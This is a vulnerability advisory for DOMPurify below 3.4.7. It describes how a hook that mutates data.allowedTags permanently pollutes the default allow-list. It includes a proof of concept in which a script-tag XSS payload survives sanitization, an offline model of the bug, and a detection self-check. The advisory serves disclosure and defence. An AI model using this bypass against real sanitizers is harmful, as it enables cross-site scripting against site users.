Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade dompurify to version 3.4.7 or higher.
dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.
Affected versions of this package are vulnerable to Trust Boundary Violation: a hook that mutates data.allowedTags or data.allowedAttributes writes directly into the global default allow-list objects used for sanitization, because those objects are handed to hooks by reference rather than as per-call copies. An attacker can therefore cause persistent changes to the default allow-lists, so that malicious tags or attributes bypass sanitization in later calls, including calls made after the hook has been removed, by injecting payloads that rely on the polluted configuration.
Note: This is only exploitable if a hook is registered that mutates data.allowedTags or data.allowedAttributes, and later sanitization occurs without explicitly setting restrictive configuration arrays (for example an explicit ALLOWED_TAGS / ALLOWED_ATTR config).
```javascript
// Proof of concept: runs in a browser (or jsdom) with an affected DOMPurify
// version (< 3.4.7) loaded, e.g. `import DOMPurify from 'dompurify';`

// 1) fresh DOMPurify, default config: script is blocked
DOMPurify.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg></svg>"

// 2) install a hook that mutates data.allowedTags (a natural-looking pattern);
//    data.allowedTags is the shared default object, not a per-call copy
DOMPurify.addHook('uponSanitizeElement', (node, data) => {
  data.allowedTags['script'] = true;
});

// 3) one sanitize call WITH the hook: script survives (expected while the hook is active)
DOMPurify.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg><script>alert(1)</script></svg>"

// 4) remove the hook and reset the config
DOMPurify.removeAllHooks();
DOMPurify.clearConfig();

// 5) sanitize attacker content with default config: POLLUTION PERSISTS
DOMPurify.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg><script>alert(1)</script></svg>" ← script survived without any hook

// 6) the only recovery: create a fresh DOMPurify instance
const fresh = DOMPurify(window);
fresh.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg></svg>" ← clean
```
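The following is an added example, not DOMPurify's own code and not part of the Snyk advisory. It models the root cause in a few lines so it runs offline without dompurify or a DOM: a hook-driven sanitizer whose default allow-list is handed to hooks by reference (the affected behaviour) beside one that copies the defaults per call (the fixed behaviour), plus a startup self-check that detects polluted defaults. Markup is represented as a constructed array of tag names rather than parsed HTML, and the names makeSanitizer, reproduce and defaultsPolluted are assumptions of this example.

```javascript
// Minimal model of the shared-default-allow-list bug (example code, not DOMPurify).
// `cloneDefaults: false` reproduces the affected versions; `true` models the fix.
function makeSanitizer({ cloneDefaults }) {
  // Per-instance defaults, mirroring how a fresh sanitizer instance starts clean.
  const DEFAULT_ALLOWED_TAGS = { b: true, i: true, p: true, svg: true };
  const hooks = [];

  // `tags` is a constructed array of tag names standing in for a parsed document.
  function sanitize(tags, cfg = {}) {
    let allowedTags;
    if (cfg.ALLOWED_TAGS) {
      // Explicit config always builds a fresh object, so hook writes cannot persist.
      allowedTags = Object.fromEntries(cfg.ALLOWED_TAGS.map((t) => [t, true]));
    } else {
      // Affected behaviour: the shared default object itself is used, so any
      // mutation made by a hook becomes a permanent change to the defaults.
      allowedTags = cloneDefaults ? { ...DEFAULT_ALLOWED_TAGS } : DEFAULT_ALLOWED_TAGS;
    }
    return tags.filter((tag) => {
      const data = { tagName: tag, allowedTags };
      for (const hook of hooks) hook(tag, data); // hooks see `data.allowedTags`
      return data.allowedTags[data.tagName] === true;
    });
  }

  return {
    sanitize,
    addHook: (hook) => hooks.push(hook),
    removeAllHooks: () => { hooks.length = 0; },
  };
}

// Replays steps 1-5 of the advisory's proof of concept against the model.
function reproduce(cloneDefaults) {
  const purify = makeSanitizer({ cloneDefaults });
  const input = ['svg', 'script'];
  const before = purify.sanitize(input);                                  // ['svg']
  purify.addHook((node, data) => { data.allowedTags.script = true; });    // the mutating hook
  const withHook = purify.sanitize(input);                                // ['svg', 'script']
  purify.removeAllHooks();
  const after = purify.sanitize(input);     // affected: ['svg', 'script']; fixed: ['svg']
  const explicit = purify.sanitize(input, { ALLOWED_TAGS: ['svg'] });     // ['svg'] either way
  return { purify, before, withHook, after, explicit };
}

// Defensive self-check: sanitize a known-bad probe with the default config and
// compare against the expected result. Run it at startup or in CI to catch a
// polluted default allow-list before user content is processed.
function defaultsPolluted(purify) {
  return purify.sanitize(['script']).length !== 0;
}
```

Two practical points follow from the model. First, passing an explicit ALLOWED_TAGS array (or extending via the dedicated config options rather than mutating the objects a hook receives) keeps every call on its own copy of the allow-list, which is the workaround the advisory's note describes. Second, a probe like defaultsPolluted is cheap to run after application startup and turns a silent, persistent allow-list change into a detectable failure.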